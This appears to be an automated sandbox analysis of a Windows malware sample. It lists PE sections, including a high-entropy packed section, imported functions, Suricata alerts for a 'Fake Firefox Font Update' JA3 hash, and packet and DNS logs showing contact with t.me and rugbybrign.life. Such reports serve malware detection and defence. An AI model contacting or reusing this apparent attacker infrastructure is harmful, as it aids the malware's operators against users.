                    IMAGE_DIRECTORY_ENTRY_IAT0x32f080x268.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x29aa70x29c00bc39eb6dd60785e4180e7c7cbb3afa99False0.5047717065868264data6.600671819762486IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x2b0000x9c0c0x9e0087242c2b164715b145e7eeeb049c8f17False0.41544699367088606data4.795620390693286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x350000x20400xc00da54f09d231e8fd39b1de467f9d4a7c5False0.17805989583333334data2.440587319916063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .pdata0x380000x15b40x1600092a09f2375815764b7919ab42978e4dFalse0.4836647727272727data5.410912571801746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .gxfg0x3a0000x13e00x140007ef09fd727107c6620b60102558fa00False0.43828125PGP symmetric key encrypted data - Plaintext or unencrypted data5.090449058306497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .retplne0x3c0000x8c0x2008c950f651287cbc1296bcb4e8cd7e990False0.126953125data1.050583247971927
                    _RDATA0x3d0000x1f40x2007b11f7add986212d544d974c3e5f9c4fFalse0.53125data4.225546917809558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x3e0000x6680x800edea3649b03d6ab7210f59a9f658694eFalse0.501953125data4.9254112948995346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .bss0x3f0000x578000x57800838b40afaca0bfe6f96480f9afb914aeFalse1.0003236607142858data7.9994845828140875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    DLLImport
                    KERNEL32.dllCloseHandle, CompareStringW, CreateFileW, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-03-17T08:20:11.062614+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449711149.154.167.99443TCP
                    2025-03-17T08:20:11.950375+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449712104.21.32.1443TCP
                    2025-03-17T08:20:13.153460+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449713104.21.32.1443TCP
                    2025-03-17T08:20:14.178888+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449714104.21.32.1443TCP
                    2025-03-17T08:20:15.203038+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449717104.21.32.1443TCP
                    2025-03-17T08:20:16.457199+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449718104.21.32.1443TCP
                    2025-03-17T08:20:17.617692+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449720104.21.32.1443TCP
                    2025-03-17T08:20:19.605021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449722104.21.32.1443TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Mar 17, 2025 08:20:10.414917946 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:10.414963961 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:10.415024042 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:10.417618990 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:10.417634964 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.062391996 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.062613964 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.065653086 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.065664053 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.065884113 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.109651089 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.152327061 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435384035 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435404062 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435417891 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435447931 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435475111 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.435497999 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435509920 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.435511112 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.435533047 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.435559988 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.464159012 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.464179039 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.464188099 CET49711443192.168.2.4149.154.167.99
                    Mar 17, 2025 08:20:11.464194059 CET44349711149.154.167.99192.168.2.4
                    Mar 17, 2025 08:20:11.481889963 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.481913090 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:11.481987000 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.482240915 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.482255936 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:11.626147985 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:11.938119888 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:11.950179100 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:11.950375080 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.976377010 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.976397038 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:11.976634026 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:11.988158941 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.988158941 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:11.988244057 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372697115 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372751951 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372777939 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372802019 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.372803926 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372822046 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.372845888 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.373311996 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.373342037 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.373352051 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.373358965 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.373395920 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.377224922 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.377280951 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.377305031 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.377521038 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.377530098 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.377564907 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.484486103 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.484543085 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.484589100 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.511218071 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.511234999 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.511245966 CET49712443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.511250973 CET44349712104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.547445059 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:12.686953068 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.686995983 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:12.687072992 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.687429905 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:12.687443018 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.153287888 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.153460026 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.154548883 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.154565096 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.154787064 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.155853033 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.155977964 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.156008005 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.156064987 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.156073093 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.696868896 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.696969986 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.697155952 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.697186947 CET49713443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.697202921 CET44349713104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.714837074 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.714871883 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.714957952 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.715277910 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:13.715290070 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:13.750695944 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:14.178818941 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.178888083 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.180360079 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.180366993 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.180589914 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.184290886 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.186284065 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.186317921 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.667990923 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.668078899 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.668253899 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.668283939 CET49714443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.668299913 CET44349714104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.746360064 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.746406078 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:14.746480942 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.746773005 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:14.746786118 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.202843904 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.203037977 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.225589991 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.225606918 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.225822926 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.266218901 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.268193007 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.268400908 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.268425941 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.268501997 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.268512964 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.800735950 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.800826073 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.800875902 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.800968885 CET49717443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.800990105 CET44349717104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.971873999 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.971920013 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:15.971998930 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.972839117 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:15.972855091 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.156969070 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:16.457128048 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.457199097 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.458352089 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.458362103 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.458616972 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.461519957 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.461600065 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.461613894 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.900300026 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.900424004 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:16.900509119 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.900712013 CET49718443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:16.900724888 CET44349718104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.161062956 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.161098003 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.161212921 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.161516905 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.161529064 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.617465973 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.617691994 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.619292021 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.619299889 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.619497061 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.620800018 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.621776104 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.621810913 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.621906042 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.621938944 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622036934 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622143984 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622266054 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622289896 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622415066 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622443914 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622571945 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622600079 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622601032 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622622967 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622744083 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622781992 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622822046 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.622956991 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.622994900 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.623009920 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.632575989 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.632761955 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.632783890 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.632827044 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.633023977 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:17.633044958 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:17.638499975 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.144762993 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.144862890 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.144917011 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.145009041 CET49720443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.145020008 CET44349720104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.148766041 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.148806095 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.148885965 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.149163961 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.149183035 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.604965925 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.605021000 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.607168913 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.607180119 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.607420921 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:19.608814955 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.608874083 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:19.608916998 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005312920 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005382061 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005418062 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005429029 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.005444050 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005479097 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.005482912 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005496025 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.005548954 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.005557060 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006321907 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006359100 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006361961 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.006369114 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006413937 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.006421089 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006432056 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006474972 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.006551981 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.006562948 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.006575108 CET49722443192.168.2.4104.21.32.1
                    Mar 17, 2025 08:20:20.006580114 CET44349722104.21.32.1192.168.2.4
                    Mar 17, 2025 08:20:20.391674042 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:20.704461098 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:20.969551086 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:21.313133955 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:22.516268969 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:23.909570932 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:24.219425917 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:24.828775883 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:24.922522068 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:26.031989098 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:27.372817993 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:20:27.378122091 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:20:27.378201008 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:20:27.378354073 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:20:27.383635044 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:20:27.992652893 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:20:28.001986980 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:20:28.006669998 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:20:28.180813074 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:20:28.235043049 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:20:28.438169003 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:29.735189915 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:30.578834057 CET49671443192.168.2.4204.79.197.203
                    Mar 17, 2025 08:20:33.250811100 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:39.344526052 CET49678443192.168.2.420.189.173.27
                    Mar 17, 2025 08:20:42.860141993 CET4968180192.168.2.42.17.190.73
                    Mar 17, 2025 08:20:56.791107893 CET8049710217.20.57.19192.168.2.4
                    Mar 17, 2025 08:20:56.791241884 CET4971080192.168.2.4217.20.57.19
                    Mar 17, 2025 08:21:29.188662052 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:21:29.195442915 CET8049727142.250.186.67192.168.2.4
                    Mar 17, 2025 08:21:29.195514917 CET4972780192.168.2.4142.250.186.67
                    Mar 17, 2025 08:21:58.921596050 CET44349709131.253.33.254192.168.2.4
                    Mar 17, 2025 08:21:58.921680927 CET49709443192.168.2.4131.253.33.254
                    TimestampSource PortDest PortSource IPDest IP
                    Mar 17, 2025 08:20:10.402342081 CET6520053192.168.2.41.1.1.1
                    Mar 17, 2025 08:20:10.408970118 CET53652001.1.1.1192.168.2.4
                    Mar 17, 2025 08:20:11.469361067 CET6246853192.168.2.41.1.1.1
                    Mar 17, 2025 08:20:11.481318951 CET53624681.1.1.1192.168.2.4
                    Mar 17, 2025 08:20:27.363631010 CET5024153192.168.2.41.1.1.1
                    Mar 17, 2025 08:20:27.370429993 CET53502411.1.1.1192.168.2.4
                    Mar 17, 2025 08:20:40.236231089 CET6385553192.168.2.41.1.1.1
                    Mar 17, 2025 08:20:40.242855072 CET53638551.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Mar 17, 2025 08:20:10.402342081 CET192.168.2.41.1.1.10x6ae1Standard query (0)t.meA (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.469361067 CET192.168.2.41.1.1.10xddb9Standard query (0)rugbybrign.lifeA (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:27.363631010 CET192.168.2.41.1.1.10x668aStandard query (0)c.pki.googA (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:40.236231089 CET192.168.2.41.1.1.10xa88Standard query (0)c.pki.googA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Mar 17, 2025 08:20:10.408970118 CET1.1.1.1192.168.2.40x6ae1No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.32.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.112.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.48.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.16.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.64.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.80.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:11.481318951 CET1.1.1.1192.168.2.40xddb9No error (0)rugbybrign.life104.21.96.1A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:26.867141962 CET1.1.1.1192.168.2.40xef02No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:26.867141962 CET1.1.1.1192.168.2.40xef02No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                    Mar 17, 2025 08:20:27.370429993 CET1.1.1.1192.168.2.40x668aNo error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                    Mar 17, 2025 08:20:27.370429993 CET1.1.1.1192.168.2.40x668aNo error (0)pki-goog.l.google.com142.250.186.67A (IP address)IN (0x0001)false
